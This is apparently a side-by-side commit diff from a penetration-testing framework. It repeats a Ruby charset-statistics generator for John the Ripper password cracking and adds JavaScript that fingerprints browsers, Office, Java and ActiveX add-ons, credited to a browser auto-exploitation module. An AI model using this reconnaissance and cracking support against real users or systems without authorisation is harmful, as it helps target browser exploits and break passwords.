puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

96
data/john/run.linux.x86.mmx/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

96
data/john/run.linux.x86.sse2/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

96
data/john/run.win32.any/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

96
data/john/run.win32.mmx/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

96
data/john/run.win32.sse2/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong' require 'getoptlong'
def help def help
puts "Usage: #{$0} [options]" puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help." puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file." puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789" puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz" puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ" puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num" puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num" puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*" puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom" puts "\t-c --custom"
puts "\nExample:\n" puts "\nExample:\n"
puts "#{$0} -f stats -s" puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\"" puts "#{$0} -f stats -c \"0123abc+=\""
exit exit
end end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz' ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*' ch_sp = '!@#$+=.*'
opts = GetoptLong.new( opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ], [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT], [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT], [ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT], [ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ], [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ], [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ], [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ], [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ] [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
) )
charset = nil charset = nil
filename = "stats_out" filename = "stats_out"
opts.each do |opt, arg| opts.each do |opt, arg|
case opt case opt
when '--help' when '--help'
help help
when '--file' when '--file'
filename = arg filename = arg
when '--num' when '--num'
charset = ch_num charset = ch_num
when '--alpha' when '--alpha'
charset = ch_alpha charset = ch_alpha
when '--alphamaj' when '--alphamaj'
charset = ch_alpha.capitalize charset = ch_alpha.capitalize
when '--alphanum' when '--alphanum'
charset = ch_alpha + ch_num charset = ch_alpha + ch_num
when '--alphanummaj' when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num charset = ch_alpha.capitalize + ch_num
when '--all' when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom' when '--custom'
charset = arg charset = arg
end end
end end
if charset == nil if charset == nil
help help
end end
fstat = File.open(filename, "w") fstat = File.open(filename, "w")
charset.each_byte do |c| charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n") fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp| charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n") fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end end
end end
fstat.close fstat.close

89
data/js/detect/ie_addons.js Normal file
View File

@ -0,0 +1,89 @@
window.ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
try {
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
}
catch (e) {
types[i-1] = null;
}
}
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == 'object')
{
version = "2012";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == null)
{
version = "2010";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == null && types[4] == null)
{
version = "2007";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
types[3] == null && types[4] == null)
{
version = "2003";
}
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
types[3] == null && types[4] == null)
{
// If run for the first time, you must manullay allow the "Microsoft Office XP"
// add-on to run. However, this prompt won't show because the ActiveXObject statement
// is wrapped in an exception handler.
version = "xp";
}
else {
version = null;
}
return version;
}

64
data/js/detect/misc_addons.js Normal file
View File

@ -0,0 +1,64 @@
window.misc_addons_detect = { };
/**
* Returns the Java version
**/
window.misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}

45
lib/rex/exploitation/javascriptosdetect.js → data/js/detect/os.js
View File

@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
return d.style[propCamelCase] === css; return d.style[propCamelCase] === css;
} }
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//-- //--
// Client // Client
//-- //--
@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most // Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these. // of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/ // Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('HTMLTimeElement' in window) { if (css_is_valid('background-attachment',
ua_version = '22.0' 'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document && } else if ('createElement' in document &&
document.createElement('main') && document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) { document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0' ua_version = '21.0';
} else if ('imul' in Math) { } else if ('imul' in Math) {
ua_version = '20.0' ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) { } else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0' ua_version = '19.0';
} else if ('devicePixelRatio' in window) { } else if ('devicePixelRatio' in window) {
